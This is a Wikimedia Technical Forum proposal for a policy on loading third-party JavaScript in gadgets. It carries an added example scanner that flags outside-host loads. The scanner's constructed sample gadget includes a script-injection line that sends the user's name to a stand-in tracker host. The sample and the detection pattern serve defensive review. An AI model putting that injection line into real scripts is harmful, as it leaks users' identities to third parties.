Instructions
- Define the problem or opportunity (WHAT).
- Outline the importance of addressing the problem or opportunity (WHY).
WHAT?
In one sentence, what is the problem or opportunity?
There is no clear Wikimedia policy on the use of third-party resources, especially executable JavaScript loaded into Wikimedia websites (for example by gadgets or user scripts that fetch code from hosts outside Wikimedia). The absence of such a policy creates security and privacy risks for Wikimedia users and exposes the Foundation to financial and reputational damage.
Note: the generic term “third-party resources” is used deliberately so that the policy can cover a scope larger than JavaScript alone, if needed in the future.
What does the future look like if this is achieved?
- Gadget makers do not send user information to third parties
- There is a clear policy cautioning against loading executable JavaScript from third-party hosts
- Gadgets that, by exception, interact with third parties carry a clear privacy notice
- Gadget makers educate their peers about third-party resources and reference the policy
- WMF avoids reputational damage (example) and financial loss due to privacy violations
What happens if we do nothing?
- There is continued confusion about the handling of third-party resources in Wikimedia projects (e.g. T230124).
- Users face real-life safety consequences because ill-intentioned third parties sit between their data and the Wikimedia platform
- Unmitigated security and privacy risks from third-party resources are exploited, violating users’ privacy and the platform’s integrity
- The Foundation’s reputation is damaged if a user’s privacy or security is compromised because its platform does not police the use of third-party resources.
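As an added illustration (not part of the original proposal and not Wikimedia code), the check below shows what the mitigation described in the two lists above looks like in practice: a static scan of gadget or user-script source that flags resources loaded from hosts outside a Wikimedia allowlist, which is the kind of pattern a policy review or a gadget maker could apply before deployment. The allowlist of host suffixes, the list of loader calls and the sample gadget text are all constructed for this example; `mw.loader.load`, `importScriptURI` and `$.getScript` are real MediaWiki/jQuery entry points, but which of them a policy would treat as in scope is an assumption here.

```javascript
// Added example, not Wikimedia code: flag third-party resource loads in
// gadget / user-script source. Hosts and sample text are constructed.

// Assumed allowlist of first-party host suffixes (constructed for the example).
const ALLOWED_HOST_SUFFIXES = [
  'wikipedia.org', 'wikimedia.org', 'wikidata.org', 'mediawiki.org',
  'wiktionary.org', 'wikibooks.org', 'wikiquote.org', 'wikisource.org',
  'wikinews.org', 'wikiversity.org', 'wikivoyage.org',
];

// Quoted http(s) or protocol-relative URL literals: 'https://...', "//host/...".
const URL_LITERAL = /(["'`])((?:https?:)?\/\/[^"'`\s]+)\1/g;

// Calls that fetch or execute a remote resource (assumed set, used only to
// annotate a finding with the call on the same line, if any).
const LOAD_CALLS = /(?<![\w.])(mw\.loader\.load|importScriptURI|importStylesheetURI|\$\.getScript|\$\.ajax|fetch|XMLHttpRequest|navigator\.sendBeacon)\b/;

// Resolve a (possibly protocol-relative) URL against a wiki origin and
// return its lowercase hostname, or null if it does not parse.
function hostOf(url) {
  try {
    return new URL(url, 'https://en.wikipedia.org').hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Exact match or a proper subdomain of an allowed suffix; this rejects
// look-alikes such as "wikipedia.org.evil.example".
function isAllowedHost(host) {
  return ALLOWED_HOST_SUFFIXES.some(s => host === s || host.endsWith('.' + s));
}

// Scan source text line by line; every URL literal whose host is outside the
// allowlist becomes a finding {line, url, host, call}.
function findThirdPartyLoads(source) {
  const findings = [];
  source.split('\n').forEach((line, idx) => {
    for (const m of line.matchAll(URL_LITERAL)) {
      const url = m[2];
      const host = hostOf(url);
      if (host && !isAllowedHost(host)) {
        const call = (line.match(LOAD_CALLS) || [null])[0];
        findings.push({ line: idx + 1, url, host, call });
      }
    }
  });
  return findings;
}

// Constructed sample gadget: one first-party load (fine), one third-party
// script load, and one dynamically injected script that leaks the username.
const SAMPLE_GADGET = [
  "// constructed sample gadget",
  "mw.loader.load('https://en.wikipedia.org/w/index.php?title=MediaWiki:Gadget-foo.js&action=raw&ctype=text/javascript');",
  "$.getScript('https://cdn.example.net/analytics.js');",
  "var s = document.createElement('script');",
  "s.src = '//tracker.example.org/t.js?u=' + encodeURIComponent(mw.config.get('wgUserName'));",
  "document.head.appendChild(s);",
].join('\n');

for (const f of findThirdPartyLoads(SAMPLE_GADGET)) {
  console.log(`line ${f.line}: third-party host ${f.host}` +
              (f.call ? ` via ${f.call}` : '') + ` (${f.url})`);
}

module.exports = { findThirdPartyLoads, isAllowedHost, hostOf, SAMPLE_GADGET };
```

Running it on the sample reports lines 3 and 5 and leaves the first-party `mw.loader.load` alone. The scan is deliberately a heuristic: it only sees string literals, so a URL assembled at runtime or loaded through an allowed host that redirects elsewhere would pass, which is why a policy still needs a human review step for gadgets that legitimately contact third parties.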
WHY?
Identify the value(s) this problem/opportunity provides. Add links to relevant OKRs.
Rank values in order of importance and be explicit about who this benefits and where the value is.
User Value/Organization Value | Objective it supports and How
Users’ privacy is shielded from external parties, rather than their data being shared without their knowledge (e.g. T275754) | Thriving Movement, especially regarding Safe and Secure Spaces (T-O13-D1)
Gadget makers and developers are educated and empowered to mitigate privacy risks using the policy | Platform Evolution, especially allowing for the mitigation of risks for both development teams and operational stakeholders, building trust in our development processes (KR3)
Legal and Security staff do fewer reviews of gadgets loading third-party resources, since the community enforces the policy upstream | Thriving Foundation - Technical Infrastructure, in particular around decreased consumption of operational services (Resilience’s KR3).
Why are you bringing this decision to the Technical Forum?
What about the scope of this problem led you and your team to seek input across departments/organizations?